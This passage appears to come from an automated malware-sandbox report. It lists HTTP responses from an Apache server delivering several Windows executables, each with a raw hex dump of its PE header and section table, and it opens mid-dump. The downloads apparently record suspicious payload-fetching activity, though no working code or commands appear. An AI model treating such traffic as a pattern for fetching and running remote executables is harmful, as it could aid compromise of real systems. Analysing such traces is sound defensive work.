00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 28 17 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 c8 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 95 00 00 00 40 0d 00 00 96 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 8a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:25 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:26 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:26 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 